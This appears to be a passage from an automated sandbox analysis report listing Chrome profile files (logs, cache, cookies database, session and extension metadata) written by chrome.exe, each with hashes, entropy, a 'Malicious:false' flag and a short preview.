                                                                                                                                                                                                                        SSDEEP:6:mBPdxxU1lL+q2PWXp+N23iKKdK9RXXTZIFUtAPdxLWz1Zmw2PdxF0LVkwOWXp+Ns:uPC1Iva5Kk7XT2FUtAP7Wz1/2Pa5f5KU
                                                                                                                                                                                                                        MD5:D9423C825B7DCE6B7E69E073A372EE3E
                                                                                                                                                                                                                        SHA1:22FAB73F855C788BF792AC4D8E55CD139D4528C5
                                                                                                                                                                                                                        SHA-256:9BCCA9816E11493121B85760C1B495178C7B6A673DF244DAC91EF9FB37379180
                                                                                                                                                                                                                        SHA-512:86F06B45DA916AFBA1D9FB6E683D700E13E17B3C8E5FC6D793F24D2CAAB4D0298EA12B28D20680F699DAEA259B0505E8DF3826F7081A6AB11BBB46C15F99226B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.060 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/12/06-19:08:55.062 15e8 Recovering log #3.2021/12/06-19:08:55.071 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):318
                                                                                                                                                                                                                        Entropy (8bit):5.2083080756078965
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxuOFL+q2PWXp+N23iKKdKyDZIFUtAPdxzAHz1Zmw2PdxIaLVkwOWXp+N23ir:uPe/va5Kk02FUtAPu1/2PL5f5KkWJ
                                                                                                                                                                                                                        MD5:A66E8A20F795325E7D8112F504E1C564
                                                                                                                                                                                                                        SHA1:C6B8EF5472D3EF0BA893AFDC8987ED49D1265FD2
                                                                                                                                                                                                                        SHA-256:DBF4664A60C79AE428D778707261E0AB9A52634470F86DAB937D4E936CE52647
                                                                                                                                                                                                                        SHA-512:E586229001BFA38468CE2307D1261B9A798D080C7F737B34A4296C8587B8B76BD73D9D19A064903A7EF84D3E4E25FAA97FD20765CCDCB950FE051C62843D668E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.054 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/12/06-19:08:55.055 15e8 Recovering log #3.2021/12/06-19:08:55.056 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.oldDB (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):318
                                                                                                                                                                                                                        Entropy (8bit):5.2083080756078965
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxuOFL+q2PWXp+N23iKKdKyDZIFUtAPdxzAHz1Zmw2PdxIaLVkwOWXp+N23ir:uPe/va5Kk02FUtAPu1/2PL5f5KkWJ
                                                                                                                                                                                                                        MD5:A66E8A20F795325E7D8112F504E1C564
                                                                                                                                                                                                                        SHA1:C6B8EF5472D3EF0BA893AFDC8987ED49D1265FD2
                                                                                                                                                                                                                        SHA-256:DBF4664A60C79AE428D778707261E0AB9A52634470F86DAB937D4E936CE52647
                                                                                                                                                                                                                        SHA-512:E586229001BFA38468CE2307D1261B9A798D080C7F737B34A4296C8587B8B76BD73D9D19A064903A7EF84D3E4E25FAA97FD20765CCDCB950FE051C62843D668E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.054 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/12/06-19:08:55.055 15e8 Recovering log #3.2021/12/06-19:08:55.056 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                                                        Entropy (8bit):0.03612967664614773
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:/F8KzrlMNGCLrYsEfp1Bc+pHwgP2HPl3MtK:dJkXPIfp1q+pHwA2HPdEK
                                                                                                                                                                                                                        MD5:BE9C7C433FD4BD20316DA43341C308C4
                                                                                                                                                                                                                        SHA1:7FD89294A816F6EABB30F996671439DEAE5FAA53
                                                                                                                                                                                                                        SHA-256:8871EFFA1CF97DC431C54831576BB3C9405FB7F55D34A9F765F1C80B5BD9F253
                                                                                                                                                                                                                        SHA-512:0B94039FB37575E2D5297ECB4FA66AFE73682F3888BBEC52E77777E3033D106A616BC8046D3A122BE0C83BDEC78E8F5568D7DD2400EDF72A8EB9D122E35A3B9F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                        Entropy (8bit):0.03174662860793439
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:U/MmXAindOUAVFU/BlWlHzYGiAZY/oZ6gD09iAHCjsnU6jKjWrUAVFeBtWfWu5CE:JmwiA76YYwD0rCjiU6eq9eBk+uZO
                                                                                                                                                                                                                        MD5:29CFA7919D0C395B463DA2A3534326F0
                                                                                                                                                                                                                        SHA1:486F96A01BFF53090D25A5A51EEBEAFEDE1EB0F5
                                                                                                                                                                                                                        SHA-256:571CEE20E0A82D6D055C9D9E0C62AEA4C89079D4A6C3FBBBA23E74B794811793
                                                                                                                                                                                                                        SHA-512:8D36B7490A311C164246D08CD25DF355A845ADEC02363F5145F129F1A161ACD818384C006C42952F4DCE4F9F6B61D88CAC94C2E75B210C28926207C8CE64D322
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1056768
                                                                                                                                                                                                                        Entropy (8bit):0.10968350876104054
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:r/+fN0y59zTjvExVbT1jkwbtQXc6/+fN0y59zTjvExVbT1jkwbtQXc:iflvELJZbtMchflvELJZbtMc
                                                                                                                                                                                                                        MD5:5E8A0FF44C9A437A134533072FF122E4
                                                                                                                                                                                                                        SHA1:A3DA2046219F68B7C72E554C0520C887307D0FCC
                                                                                                                                                                                                                        SHA-256:E532EFBADA16111FA002E3D69A456D346374063741244304A5BAC562A63EB33B
                                                                                                                                                                                                                        SHA-512:CF38D3E0FE5A2D96C07CD3949089C04140A41B62F39581B903A2FF03EEBD05830DC5688521584635DD526E45C51F2693B96D9D06E18BB968B6F2A6A211F8810E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4202496
                                                                                                                                                                                                                        Entropy (8bit):0.0419784165852963
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:0AikP/L/4bFCI1fMR5JhFFFJZbtMVehvit61JZbtMKU:lL/dR5bFFjJtGehzJtRU
                                                                                                                                                                                                                        MD5:88F90C8912A06881729C41A541819F1D
                                                                                                                                                                                                                        SHA1:7FFBDCAA3F57AC1A7028CE8444C31DA5EB29E7C0
                                                                                                                                                                                                                        SHA-256:25FD15A87F3FB3B31C9DDD219DD87DCB23E675F58040DBDBCB0F61B8C3CDCA87
                                                                                                                                                                                                                        SHA-512:CFB2F1ADDF5CF8FB69BD2214D2FBDAB2251B1D53922D0356A2D4FB32F7A267EF91AC2A37EC6F3B38C7652C8A16D1F083922BCF88328C441D974A15610496E830
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                        Entropy (8bit):0.5154898084991041
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:TLyqJLbXaFpEO5bNmISHn06UwcQPx5fB:TekLLOpEO5J/Kn7U1uB
                                                                                                                                                                                                                        MD5:861034A57F72A428F833D9A8C57FDB6C
                                                                                                                                                                                                                        SHA1:FE4DE8A11179326A9123EE17DE6A7D05B1068EBB
                                                                                                                                                                                                                        SHA-256:CD7D1643DE768BAC3214CDBCF0F5FB08C0FA9F4D81E3EF431CF98569E4165494
                                                                                                                                                                                                                        SHA-512:036613279BCD2D8C54EA21C80BA93DCC4D3D23E835D2FD390690011F2679DADEDE3DECAA219D1749348DB859B6D211E325E5483740984BFBBA2A590E8BCA962C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5482
                                                                                                                                                                                                                        Entropy (8bit):2.9703518002147495
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:34p6xx//9917LoubIykxQumzoP7o9LU8hIGiV5hSPFkqfdXg9On2DPwiV59/O:34mxqyIrm8Do9Ri9wdqwipO
                                                                                                                                                                                                                        MD5:9FD08E874DEA6845F3D76244735F86C9
                                                                                                                                                                                                                        SHA1:68B6AC5F1767E134DF4014BA8C2547506E4D25C2
                                                                                                                                                                                                                        SHA-256:2A83D7C2575EEDC064774B60DF94DC5C42236EA2F21E5FC2056F31C620CA0D59
                                                                                                                                                                                                                        SHA-512:13C7A27DE7A045147FDDA599EFD17608B188D3AEB2B15F12048829F89092FC82812457A02881F69F1B8F4B0E302F7CDBB1C0421A341FC0F84B9DD02A71E0C314
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: SNSS....................................................!.............................................1..,.......$...1293eea3_790b_46cf_8155_cb4a6f58db13......................r.......................................................................................................................................................................chrome://newtab/....N.e.w. .T.a.b...................................................h.......`.......................................................[.F.....\.F.............................................X...(...c.h.r.o.m.e.-.s.e.a.r.c.h.:././.l.o.c.a.l.-.n.t.p./.l.o.c.a.l.-.n.t.p...h.t.m.l.................................8.......0.......8....................................................................... ............................... ...............................h.......`.......................................................].F.....^.F.....................................................a.b.o.u.t.:.b.l.a.n.k...................H... ...<.!.-
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8
                                                                                                                                                                                                                        Entropy (8bit):1.8112781244591325
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:3Dtn:3h
                                                                                                                                                                                                                        MD5:0686D6159557E1162D04C44240103333
                                                                                                                                                                                                                        SHA1:053E9DB58E20A67D1E158E407094359BF61D0639
                                                                                                                                                                                                                        SHA-256:3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
                                                                                                                                                                                                                        SHA-512:884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: SNSS....
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):209
                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                        MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                        SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                        SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                        SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):320
                                                                                                                                                                                                                        Entropy (8bit):5.215192451506192
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPLL+q2PWXp+N23iKKdK8aPrqIFUtAPLAXZmw2PL3VkwOWXp+N23iKKdK8amLJ:uPLL+va5KkL3FUtAPLM/2PL3V5f5KkQJ
                                                                                                                                                                                                                        MD5:6B7452B3B276A6655A97C872AD26F22D
                                                                                                                                                                                                                        SHA1:AD94E19C0BD9DEF2D279733C0DF3C3E7B3FF2D77
                                                                                                                                                                                                                        SHA-256:EAE991041C4D0F1FE08E971BEA4C68D2C89F7F42DD1F0F3DFA4DE136FCE38963
                                                                                                                                                                                                                        SHA-512:130B86B1962D5721B713F83DE6D5EC8385AE788AC62C9940BD02EA6F6FB9B2CFB9C36FAAD201006D2127CE05AB6D00FB1A81081DF63ED5BE87C5CC92ED4E20C1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:09:27.211 197c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/12/06-19:09:27.214 197c Recovering log #3.2021/12/06-19:09:27.215 197c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old~ (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):320
                                                                                                                                                                                                                        Entropy (8bit):5.215192451506192
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPLL+q2PWXp+N23iKKdK8aPrqIFUtAPLAXZmw2PL3VkwOWXp+N23iKKdK8amLJ:uPLL+va5KkL3FUtAPLM/2PL3V5f5KkQJ
                                                                                                                                                                                                                        MD5:6B7452B3B276A6655A97C872AD26F22D
                                                                                                                                                                                                                        SHA1:AD94E19C0BD9DEF2D279733C0DF3C3E7B3FF2D77
                                                                                                                                                                                                                        SHA-256:EAE991041C4D0F1FE08E971BEA4C68D2C89F7F42DD1F0F3DFA4DE136FCE38963
                                                                                                                                                                                                                        SHA-512:130B86B1962D5721B713F83DE6D5EC8385AE788AC62C9940BD02EA6F6FB9B2CFB9C36FAAD201006D2127CE05AB6D00FB1A81081DF63ED5BE87C5CC92ED4E20C1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:09:27.211 197c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/12/06-19:09:27.214 197c Recovering log #3.2021/12/06-19:09:27.215 197c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW7:
                                                                                                                                                                                                                        MD5:763F7DC0C355624843438D92927ACD06
                                                                                                                                                                                                                        SHA1:E6DF45862B8D4F2DD538BEAD4A0288EACAB3AED6
                                                                                                                                                                                                                        SHA-256:B2394571D88A272B80731B23A88DB6D0490A241D4A0958C2C468C42ECF6E5DC1
                                                                                                                                                                                                                        SHA-512:58A9E61B4E6304AA2030B0335B93EA0522F68C528AE34E3101E566CF9453CDB767CCB005A003BCD3D0248B6836BE37752692AEF0C443DC416E91D26BF8FC866A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):320
                                                                                                                                                                                                                        Entropy (8bit):5.247719978154301
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPd97zdFN+q2PWXp+N23iKKdK8NIFUtAPd9bEH5Zmw2Pd9QNVkwOWXp+N23iKKb:uPJOva5KkpFUtAPa/2Psz5f5KkqJ
                                                                                                                                                                                                                        MD5:392F885F46073CF6427CBEB94A10C478
                                                                                                                                                                                                                        SHA1:D1575497B8882E0D60E96BF5261A3E07F8FDB19F
                                                                                                                                                                                                                        SHA-256:0762F8C6C95AD9E320319CF17F5FA47FBD80F16233E3CF1CB62C9892DDE4540A
                                                                                                                                                                                                                        SHA-512:4423E92A965A7582C5EDE5B8EFED99F3B93535EF7B917D01F783BF81A398CDDD173DEAC41262AF9A60BB1675E8C60C44425924E951EE3E6FB06079D101BC1DC3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:51.666 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/12/06-19:08:51.667 1ab8 Recovering log #3.2021/12/06-19:08:51.669 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old~ (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):320
                                                                                                                                                                                                                        Entropy (8bit):5.247719978154301
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPd97zdFN+q2PWXp+N23iKKdK8NIFUtAPd9bEH5Zmw2Pd9QNVkwOWXp+N23iKKb:uPJOva5KkpFUtAPa/2Psz5f5KkqJ
                                                                                                                                                                                                                        MD5:392F885F46073CF6427CBEB94A10C478
                                                                                                                                                                                                                        SHA1:D1575497B8882E0D60E96BF5261A3E07F8FDB19F
                                                                                                                                                                                                                        SHA-256:0762F8C6C95AD9E320319CF17F5FA47FBD80F16233E3CF1CB62C9892DDE4540A
                                                                                                                                                                                                                        SHA-512:4423E92A965A7582C5EDE5B8EFED99F3B93535EF7B917D01F783BF81A398CDDD173DEAC41262AF9A60BB1675E8C60C44425924E951EE3E6FB06079D101BC1DC3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:51.666 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/12/06-19:08:51.667 1ab8 Recovering log #3.2021/12/06-19:08:51.669 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):11217
                                                                                                                                                                                                                        Entropy (8bit):6.069602775336632
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
                                                                                                                                                                                                                        MD5:90F880064A42B29CCFF51FE5425BF1A3
                                                                                                                                                                                                                        SHA1:6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
                                                                                                                                                                                                                        SHA-256:965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
                                                                                                                                                                                                                        SHA-512:D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_1\_metadata\computed_hashes.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):23474
                                                                                                                                                                                                                        Entropy (8bit):6.059847580419268
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:7dNc1NC6IcafusK4H1IIGRlhKlkIALQWdynQh2RX4K6M1tVztzr7XSNyzH:7dOscSRKc1nGRSkIhEw6M1tf7SNyb
                                                                                                                                                                                                                        MD5:6AE2135EA4583C2F06CDEBEA4AE70FA4
                                                                                                                                                                                                                        SHA1:DCEB26C7F02D53B5F214305F4C75B4A33A79CDC2
                                                                                                                                                                                                                        SHA-256:03AA1944CB3C4F39E20B6361571BC45DFBEBD3FFDA3D8F148CC6ECB29958F903
                                                                                                                                                                                                                        SHA-512:B5945E67D9F73DD1982D687E5C6D9B5D6B3886C8050363A259755C76AC0F93651F3425FA7C21AA6A13977AC1C8C9322F998F131648CB8909096058D4F0D23312
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"file_hashes":[{"block_hashes":["DOZdV3jFvk12AM2JNDYKo3KZrIVRprmJ+sVGWkqqE4Q=","rVElW3Hu3T52SzDDUqGT5YiJTBGUv2h3pNuBKFlhZ1U=","X/3fg4KZxgQ1jBr5QGq0F5JnflgE27UErd88mrxTcxs=","VibLbpy0ig+5INMOU71fTYN76iaka2XVpmm1qAKYsX8=","EChCwCbQHbHQ7oDdGT2qNyiRJ0yck2YC2emNGq4whtE="],"block_size":4096,"path":"_locales/iw/messages.json"},{"block_hashes":["xklkoZ7iSU1+7cd6DAtEmUC5lPFd+EgcbnzxkOiFwlk=","3KbsvoxKY/3AwqgF2aAdVQRpMhsNVRkQ3rx2A6Z2Z+Y=","o9+tsohquaCMj+70zeinRG/hBhA2uLoDl/WoC1uokME=","xV/K8xucyWJELVT8Cqn+ugFjobBVmg8pnmACF+2PP4Y=","p/mvJm2wuCl32Rx3it654MljKAsMe3S9IDEabc1A8mE=","j8mPrTb5oOsBTj2Fer78JE6xG6+kR64Cvu2SW8d3j/k=","nqSRpGQ3USU2bZJsZ+AzBmFOyann8omwJrhEWFZDTXc=","eTcQyJUuNuF9yCga/fXGyFCj/pysSceanhBzksdx23s=","Wj7faqnspelXKMvnduxHn1XUBG8TEOqyns7/oUihekM=","VtBwXoadI3EP336rAiL33Gz19KGqtN+RYdKnMKAXoLw=","iDgLXQqXJp8nCZxgLuC9LXM45DGfufvGnXvmHsn18wc=","g+RfdDfrWTUK0Pkcsbot7NJ4SC9wVRV/dVVMuHAtEj8=","2oC4HcCuXu3VjFf6wnKlznt9uqQNaebcuWpm/mWj69U=","aMUIpuFqPMiieSaWhIktCK62v2P3OZQAWupWsYzCnvk=","L
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
